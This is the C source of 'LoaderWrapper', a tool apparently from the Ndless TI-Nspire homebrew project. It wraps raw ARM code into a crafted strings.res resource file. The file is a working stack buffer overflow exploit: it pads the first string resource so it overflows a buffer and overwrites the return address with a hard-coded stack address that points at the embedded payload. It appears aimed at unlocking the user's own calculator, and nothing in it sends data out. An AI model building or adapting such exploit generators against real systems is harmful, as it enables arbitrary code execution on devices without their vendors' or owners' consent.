/* * The contents of this file are subject to the Mozilla Public * License Version 1.1 (the "License"); you may not use this file * except in compliance with the License. You may obtain a copy of * the License at http://www.mozilla.org/MPL/ * * Software distributed under the License is distributed on an "AS * IS" basis, WITHOUT WARRANTY OF ANY KIND, either express or * implied. See the License for the specific language governing * rights and limitations under the License. * * The Original Code is Ndless code. * * The Initial Developer of the Original Code is Olivier ARMAND * . * Portions created by the Initial Developer are Copyright (C) 2010 * the Initial Developer. All Rights Reserved. * * Contributor(s): * Geoffrey ANNEHEIM . */ #include #include #include #define FIRST_RESOURCE_BYTES_SIZE 5180 // size of the first string resource: just enough to overflow the buffer #define PAYLOAD_BASE_ADDRESS 0x1800E15C // stack address where is located the resource buffer #define MAX_PAYLOAD_BYTES_SIZE FIRST_RESOURCE_BYTES_SIZE - 4 // 4: size of the function return address overwritten void printUsage() { puts( "Usage: LoaderWrapper \n" " contains raw ARM code" ); } void printErrorAndExit(const char* msg, int code) { printf("Error: %s\n", msg); exit(code); } void writeLittleEndian(FILE* fOut, unsigned long i) { /*unsigned long iEndianness = ((i & 0xff) << 24) + ((i & 0xff00) << 8) + ((i & 0xff0000) >> 8) + ((i >> 24) & 0xff);*/ unsigned long iEndianness = i; // Thanks of x86 architecture fwrite(&iEndianness, sizeof(unsigned long), 1, fOut); } int getFileSize(FILE *f) { int pos; int end; pos = ftell(f); fseek (f, 0, SEEK_END); end = ftell(f); fseek (f, pos, SEEK_SET); return end; } void wrap(FILE* fIn, FILE* fOut, int payload_size) { char* buffer; if (payload_size > MAX_PAYLOAD_BYTES_SIZE) { return; } // Build a strings.res file (header) writeLittleEndian(fOut, 1); // number of string resources in the file writeLittleEndian(fOut, 0xFFFF); // a size used for overflow checking, not sure what it is, make it high writeLittleEndian(fOut, FIRST_RESOURCE_BYTES_SIZE); buffer = (char*)malloc(MAX_PAYLOAD_BYTES_SIZE); memset(buffer, 0x00, MAX_PAYLOAD_BYTES_SIZE); fread(buffer, payload_size, 1, fIn); fwrite(buffer, MAX_PAYLOAD_BYTES_SIZE, 1, fOut); free(buffer); writeLittleEndian(fOut, PAYLOAD_BASE_ADDRESS); } int main(int argc, char* argv[]) { FILE* fileInput, *fileOutput; int payload_size; if (argc != 3) { printUsage(); return -1; } fileInput = fopen(argv[1], "rb"); if (fileInput == NULL) { printErrorAndExit("Could not open the input file.", 1); } payload_size = getFileSize(fileInput); if (payload_size > MAX_PAYLOAD_BYTES_SIZE) { printf("Error: Input file cannot be bigger than %ul bytes", MAX_PAYLOAD_BYTES_SIZE); fclose(fileInput); exit(3); } fileOutput = fopen(argv[2], "wb"); if (fileOutput == NULL) { fclose(fileInput); printErrorAndExit("Could not create the output file.", 2); } wrap(fileInput, fileOutput, payload_size); fclose(fileInput); fclose(fileOutput); printf("File '%s' successfully created !\n", argv[2]); return EXIT_SUCCESS; }